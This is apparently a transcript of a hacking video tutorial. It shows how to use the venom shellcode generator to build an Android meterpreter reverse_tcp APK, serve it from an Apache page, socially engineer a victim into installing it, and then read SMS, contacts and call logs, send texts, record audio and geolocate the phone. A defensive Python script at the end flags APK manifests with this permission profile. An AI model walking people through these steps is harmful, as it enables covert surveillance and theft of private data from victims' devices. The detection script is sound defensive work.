Hello everybody, and in this video I will show you how you can actually automate the entire process of hacking Android and iOS devices. Now in the previous videos we showed how we can actually hack some Linux systems, we also saw how we can hack Windows systems as well, and I also showed you how you can run the attacks over the Internet. But right now let's see what we can do with the Android attacks, for example.

So if I just open up my terminal first, type in the root password. I will make this larger so you can see. And what I want to do right now is go to Firefox. So just open up your Firefox. The tool is called venom I believe, or something like that. I already have it installed so I will not install it, but I will show you from where you can get it. It is on GitHub. So you just do this simple git clone and then the link .git, and you just run the program. It is very simple. So, venom github right here, and you go to the first link as it says right here, github venom Metasploit shellcode generator. It is a very simple tool to use. So just copy the link and git clone it to your directory. As we can see, download/install. The first part you need to do is git clone this link right here, then set files execution permissions to... so first change directory to the venom, and then sudo chmod -R +x all files. This star right here stands for all files .sh, and also do that for Python files. If you do not have dependencies installed you can run ./setup.sh, and then after that you can run the main tool. So, if you do not have all the dependencies installed and if you do not download the files to already be executable, you need to follow these four steps, or basically these three steps. The fourth one is just running the tool. So, once you do that, you should be good to go.

Let me just find where I downloaded it... or we can just locate venom, simple as that. So locate venom... or maybe it's not. Okay, so it is in PythonFiles. Okay, so cd home/user/Desktop/PythonFiles/venom. So, here you will have these same files right here. If you already ran the entire installation process, all you need to do is run this venom.sh file. So you do that with ./venom.sh, and this will open up the shellcode generator. Now the first thing that it will ask you is to input your IP address. Now, if you do not know your IP address you can just check it with ifconfig. I know mine, so it is 192.168.1.15, click here enter, and it will open this welcome box right here with the banner. Press enter to continue, we press enter. It will ask us which shellcode we want to generate.

Now as we can see right here it doesn't only generate the Android and iOS payload, you can also generate the Linux, Windows and multi-OS payloads. Now since we already covered all of the other ones, we will just cover the Android ones and iOS. So just click here 4, which stands for basically both of these. So just click 4 as a category number. It will say loading Android | iOS agents. Now since I don't have the iOS mobile phone with me, I will go with the Android attack. So choose agent number; agent number 1 is the Android, so just check here 1. It will ask you for your IP address once again since it is specifying it in the meterpreter as the LHOST, which is your listening IP address, which in my case is 192.168.1.15. And right now we specify the listening port to be 4444. And the payload output name, example shellcode. So we can name it anything we want. Let's just name it as they say, so shellcode. And this will open up this shellcode generator which will generate the shellcode for us. As we can see, some of these settings down below are LPORT and LHOST that we set, and the payload that we use is android/meterpreter/reverse_tcp. Now you might notice that you can actually use this payload in the Metasploit framework as well. So you do not have to automate this process with this tool if you do not want to. It is just a lot easier since it does everything for you. You can create the payload with msfvenom, and then run the multi handler as a listener on your Metasploit framework console, and perform the same steps as we did with the Windows exploits, for example. So you just set these options right here, and check the payload to be android/meterpreter/reverse_tcp.

So, let's see what it tells us right here. Payload stored in home/user, okay so it made our shellcode. It is in this directory right here as shellcode.apk, which is basically the application which is going to run on our Android device. So what we want to do right here is: do we want to set up a multi handler by default, or an Apache 2 malicious URL? So what we want to do is basically set up Apache 2. Or you can go with the multi handler as well. I will go with Apache 2 right now, and it will start up by default our listener. As we can see right here it set all the options, the LHOST, the LPORT, the android/meterpreter/reverse_tcp, and it has started the reverse_tcp handler on 192.168.1.15, which is my IP address. So if we go right here and visit my Apache 2 on my IP address, my Apache 2 web server, so 192.168.1.15, and we go right here, as we can see as soon as I typed in my IP address, it asks me to download the shellcode.apk file.

Now of course I will not download it on my laptop since it won't really work, but we can see that the download is automated. So as soon as you visit this, the process of the downloading is automatic. So, you can basically spoof the local area network and make everyone redirect to this page, and maybe some of them will actually download this program. But, that is not that smart of an attack. So let us actually... I will now open, oops, I will now open the application from my mobile phone. So let me open up my mobile phone. I will type in the IP address, I will visit it, and as soon as I do it says this type of file can harm your device. Do you want to keep shellcode.apk? Now maybe if you were able to perform some social engineering attack, maybe they will click here OK, and shellcode.apk downloaded in home. Now you can't see what I am doing on my mobile phone, but currently I am downloading the application. Now the most suspicious part right here is when it asks, do you want to install this application? It will get access to modify system settings, take pictures and videos, modify your contacts, read your contacts, access all of the stuff, record audio, read your text messages, modify or delete the contents of your SD card, directly call phone numbers. So that is everything that we can do with this application.

And if they click install, and install the application, it will say that the application, or the mobile phone, doesn't recognize the producer of this application. You just click OK and open the application. And as we can see, as soon as I clicked open we got the meterpreter session 1 open. So, in order to check out what your available options are with the Android payload, you just type here, whoops not getuid, you type here help. Let us enlarge this window so we can see it a little bit better, and you can see we get some of the additional components, we get some more options than in the previous exploit, such as check root, dump call log, so we can get the call log. Dump contacts, dump SMS, we can read all of the SMS messages. Geolocate, send SMS. So we can actually send SMS. If you just type right here send_sms, it will tell you the syntax for sending the SMS. So the send_sms -d for the destination number, so just select the destination number, and -d for the target number. So you can actually send the SMS message from that phone to someone. And this is the -t for the SMS body text, as it says right here, so this is the message itself. You can also play the audio, which we can do on Windows as well, and all of this is the same as before. Grab screenshot, shell execute, getuid, so you can see that I really am on a mobile phone.

As we can see, server username, this is the name of the mobile user currently. And you can do all of this stuff if you wanted to. You can record microphone, you can go into shell, local time, so basically these are the more, well basically these are the important commands, or the new commands, that we didn't cover. These are the same as in other exploits. As we can see, the Android commands are right here, and you might want to actually check out some of these. We will not be actually going through them, there is really no point. You just click here the name of one of those, and it will give you the syntax to run it, and you just run that. So, that would be about it for this venom.sh tool. I hope you enjoyed it, and I hope I see you in the next tutorial. Bye!
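The install prompt the video walks through (modify system settings, take pictures and videos, read and modify contacts, record audio, read text messages, write the SD card, directly call phone numbers) is the most visible defensive signal in this whole flow: one sideloaded app asking for that entire cluster plus network access is the profile of a remote-access payload like the one generated here. The Python below is an added example, not part of this transcript and not code from the venom project or Metasploit. It parses a decoded AndroidManifest.xml (the manifest inside an APK is binary XML, so it assumes you have first decoded it, for example with `apktool d`) and flags that permission cluster. The two manifests, their package names and the threshold are constructed for the example and do not come from any real app.

```python
"""Triage a decoded AndroidManifest.xml for a RAT-like permission profile.

Added example. Assumes the manifest has already been decoded to plain XML
(e.g. with apktool); the package names, manifests and threshold below are
constructed for illustration and do not come from any real app.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# Dangerous permissions mapped to the capabilities the Android install prompt
# showed in the video. INTERNET is tracked separately: it is the channel the
# collected data would leave over, so it is what turns "nosy" into "suspicious".
RISKY_PERMISSIONS = {
    "android.permission.WRITE_SETTINGS": "modify system settings",
    "android.permission.CAMERA": "take pictures and videos",
    "android.permission.WRITE_CONTACTS": "modify contacts",
    "android.permission.READ_CONTACTS": "read contacts",
    "android.permission.RECORD_AUDIO": "record audio",
    "android.permission.READ_SMS": "read text messages",
    "android.permission.SEND_SMS": "send text messages",
    "android.permission.READ_CALL_LOG": "read call log",
    "android.permission.WRITE_EXTERNAL_STORAGE": "modify or delete SD card contents",
    "android.permission.CALL_PHONE": "directly call phone numbers",
    "android.permission.ACCESS_FINE_LOCATION": "geolocate the device",
}
NETWORK_PERMISSION = "android.permission.INTERNET"


def _manifest(package, permissions):
    """Build a constructed, apktool-style decoded manifest for the example."""
    body = "\n".join('  <uses-permission android:name="%s"/>' % p for p in permissions)
    return (
        '<manifest xmlns:android="%s" package="%s">\n%s\n'
        '  <application android:label="app"/>\n</manifest>\n' % (ANDROID_NS, package, body)
    )


# Constructed sample 1: the permission set the video's install prompt described,
# plus an unrelated permission to show that only the risky ones are counted.
SUSPICIOUS_MANIFEST = _manifest(
    "com.example.constructed.shellcode",
    [NETWORK_PERMISSION] + list(RISKY_PERMISSIONS) + ["android.permission.WAKE_LOCK"],
)

# Constructed sample 2: a camera app that legitimately needs camera and network.
BENIGN_MANIFEST = _manifest(
    "com.example.constructed.camera",
    [NETWORK_PERMISSION, "android.permission.CAMERA", "android.permission.VIBRATE"],
)


def extract_permissions(manifest_xml):
    """Return the set of permission names declared with <uses-permission>."""
    root = ET.fromstring(manifest_xml)
    return {el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR)}


def triage(manifest_xml, threshold=5):
    """Score a manifest: many risky capabilities together with INTERNET is the RAT profile."""
    root = ET.fromstring(manifest_xml)
    perms = extract_permissions(manifest_xml)
    hits = {p: RISKY_PERMISSIONS[p] for p in sorted(perms) if p in RISKY_PERMISSIONS}
    has_network = NETWORK_PERMISSION in perms
    verdict = "suspicious" if has_network and len(hits) >= threshold else "ok"
    return {
        "package": root.get("package"),
        "network": has_network,
        "risky_count": len(hits),
        "capabilities": hits,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for manifest in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        result = triage(manifest)
        print("%-40s %-10s risky=%d" % (result["package"], result["verdict"], result["risky_count"]))
        for capability in result["capabilities"].values():
            print("    -", capability)
```

Run as a script it prints one line per constructed manifest with the verdict and the capabilities that contributed to it. Against a real sample you would decode the APK first (`apktool d shellcode.apk`) and feed the resulting AndroidManifest.xml to `triage`; the threshold is a starting point to tune, since a legitimate messaging app can also declare several of these permissions, so treat the verdict as a triage hint that justifies a closer look rather than a conviction.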